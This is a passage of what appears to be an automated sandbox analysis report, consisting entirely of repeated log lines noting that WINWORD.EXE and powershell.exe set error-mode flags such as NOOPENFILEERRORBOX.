      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
